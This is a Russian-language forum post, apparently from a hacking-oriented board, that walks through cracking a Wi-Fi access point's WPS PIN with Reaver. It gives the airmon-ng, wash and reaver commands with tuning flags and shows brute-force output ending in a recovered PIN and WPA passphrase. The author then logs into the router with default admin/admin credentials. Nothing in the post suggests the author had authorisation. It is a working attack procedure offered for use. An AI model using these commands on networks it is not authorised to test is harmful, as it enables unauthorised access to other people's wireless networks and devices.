Взлом WIFI WPS с помощью Reaver.

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

lolik228

Участник

lolik228

Участник
2 Фев 2017
448
101
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Сегодня мы попробуем осуществить взлом WIFI WPS точки доступа.
Что такое WIFI WPS?

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
(защищённая установка), WPS — это стандарт (а так же протокол) полуавтоматического подключения к беспроводной сети Wi-Fi. Этот протокол был придуман дл того, чтобы упростить подключение к беспроводной сети. В итоге он и правда упростил подключение к сети. Причем для всех. Для злоумышленника он тоже упростился. Потому что, хоть в коде WPS 8 знаков, но 8-й знак это контрольная сумма, а так же в протоколе есть уязвимость, которая позволяет проверять пин-код блоками, а не целеком. Первый блок 4 цифры и второй блок 3 цифры. итого получается 9999+999=10998 комбинаций.
b4064ee5481e255eb2bc86cb6f6100e7.png

Как взламывать другие типы шифрования я рассказывал в статьях:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

А используемое оборудование в статье:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Для подбора ключа используем дистрибьютив
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, который был создан для тестов на проникновения.
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
и остальные утилиты в него уже встроены. Поэтому описывать, как их установить я не буду.
Для начала сделаем подготовительные шаги. Просканируем Wi-Fi диапазон на наличие точек с нужным типом авторизации.
Для этого переведем адаптер в режим мониторинга (будем считать, что Wi-Fi адаптер это wlan0):
Код:
airmon-ng start wlan0
В выводе команды мы увидим имя виртуального интерфейса в режиме мониторинга (обычно первый такой интерфейс это mon0).
Теперь просканируем окружающие сети:
Код:
wash -i mon0
Увидим список сетей, которые поддерживают WPS. В дальнейшем нам нужен будет BSSID сети из первой колонки.
Код:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner @tacnetsol.com>
 
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
64:XX:XX:XX:XX:F4       1            -06        1.0               No                BXXXXXXXXXXXXXXXXXXXXXXXr
F8:XX:XX:XX:XX:3B       9            -70        1.0               No                aXXXXXX4
60:XX:XX:XX:XX:B8       6            -73        1.0               No                AXXXXK</cheffner>
67e213b67d024c4ba202776a147dd51e.jpg
И наконец перейдем непосредственно к самому перебору паролей:
Код:
reaver -i mon0 -vv -b 64:XX:XX:XX:XX:F4
Где:
-i mon0 это интерфейс.
-b 64:XX:XX:XX:XX:F4 это BSSID атакуемой точки.
-vv необязательный ключ, он включает подробный вывод, но я люблю смотреть что именно сейчас происходит.
Так же есть дополнительные полезные ключи:
‐‐dh-small — задает небольшое значение секретного ключа, чем немного разгружает точку доступа и немного ускоряет брутфорс.
-t 2 — уменьшает время ожидания ответа (по умолчанию 5 секунд) в данном случае до 2 секунд.
-d 0 — пауза между попытками.
Запустится процесс перебора пин-кодов:
Код:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner @tacnetsol.com>
 
[+] Waiting for beacon from 64:XX:XX:XX:XX:F4
[+] Switching mon1 to channel 1
[+] Associated with 64:XX:XX:XX:XX:F4 (ESSID: BXXXXXXXXXXXXXXXXXXXXXXXr)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678</cheffner>
5c7bdbfa3e45432ec2f6099dd111484a.jpg
Рано или поздно мы увидим (я увидел примерно чере 6 часов) подобранный пин-код и ключ шифрования сети.
Код:
[+] WPS PIN: '762XXX99'
[+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw'
[+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr'
[+] Nothing done, nothing to save.
[+] WPS PIN: '762XXX99'
[+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw'
[+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr'
[+] Nothing done, nothing to save.
И далее подключаемся к сети.
0d7512c1b41a6bc73b8e5e60c41ea2cd.jpg
После подключения к сети, я попробовал зайти на маршрутизатор. Как это не странно, но логин/пароль: admin/admin подошел. Поэтому так же прилагаю скриншоты пин-кода и пароля Wi-Fi с самой точки доступа.
cffe034ba609ec0519d370e9e48851df.jpg

16b65a6c3c3457fbae1dc3bb88b03d74.jpg

Взлом WIFI WPS Точки доступа успешен!
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя